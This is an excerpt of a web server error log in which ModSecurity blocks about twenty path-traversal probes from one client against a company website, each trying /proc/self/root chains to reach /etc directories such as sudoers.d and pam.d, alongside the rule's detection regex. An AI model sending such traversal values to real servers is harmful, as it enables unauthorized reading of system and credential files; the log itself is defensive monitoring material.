[Tue Mar 17 10:12:59.664145 2026] [:error] [pid 1731:tid 140411674785536] [client 74.7.243.203:51804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTWwb2qCuy5irgBMjNEwAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:01.015996 2026] [:error] [pid 18604:tid 140411725141760] [client 74.7.243.203:37144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTXUBd0UqwxWindINsKgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:02.542277 2026] [:error] [pid 17965:tid 140411590858496] [client 74.7.243.203:37156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTXqt8Nd0UC_OcbVGzNgAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:03.917857 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.243.203:37172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTXweiSKl8TjouI-YGcQAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:05.237471 2026] [:error] [pid 1731:tid 140411624429312] [client 74.7.243.203:37186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTYQb2qCuy5irgBMjNFgAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:06.560964 2026] [:error] [pid 18709:tid 140411691570944] [client 74.7.243.203:37192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTYjarLhPAjZGI1b2yKgAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:07.887103 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:37200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTY-82sZHvlq4xgHrHQQAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:10.354376 2026] [:error] [pid 1731:tid 140411557287680] [client 74.7.243.203:37204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTZQb2qCuy5irgBMjNFwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:11.679915 2026] [:error] [pid 1731:tid 140411658000128] [client 74.7.243.203:44680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTZwb2qCuy5irgBMjNGAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:13.050649 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.243.203:44692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTaa4xEDsg_V3ESNY3qQAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:14.308694 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:44704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTaqBJNF7axNlVR0UBAgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:15.654503 2026] [:error] [pid 18380:tid 140411590858496] [client 74.7.243.203:44716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTa64xEDsg_V3ESNY3qwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:16.966119 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.243.203:44732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTbO82sZHvlq4xgHrHRgAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:18.343171 2026] [:error] [pid 18604:tid 140411632822016] [client 74.7.243.203:44734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTbkBd0UqwxWindINsMwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:19.623361 2026] [:error] [pid 18604:tid 140411540502272] [client 74.7.243.203:44742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTb0Bd0UqwxWindINsNAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:20.799999 2026] [:error] [pid 18604:tid 140411574073088] [client 74.7.243.203:40580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTcEBd0UqwxWindINsNQAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:22.137330 2026] [:error] [pid 18604:tid 140411725141760] [client 74.7.243.203:40596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTckBd0UqwxWindINsNgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:23.447742 2026] [:error] [pid 18604:tid 140411616036608] [client 74.7.243.203:40608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTc0Bd0UqwxWindINsOQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:24.603211 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:40620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTdKBJNF7axNlVR0UBBQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:25.900183 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.243.203:40622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTdQb2qCuy5irgBMjNGgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:27.236124 2026] [:error] [pid 18709:tid 140411733534464] [client 74.7.243.203:40636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablTdzarLhPAjZGI1b2yLAAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:13:28.530527 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:40646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 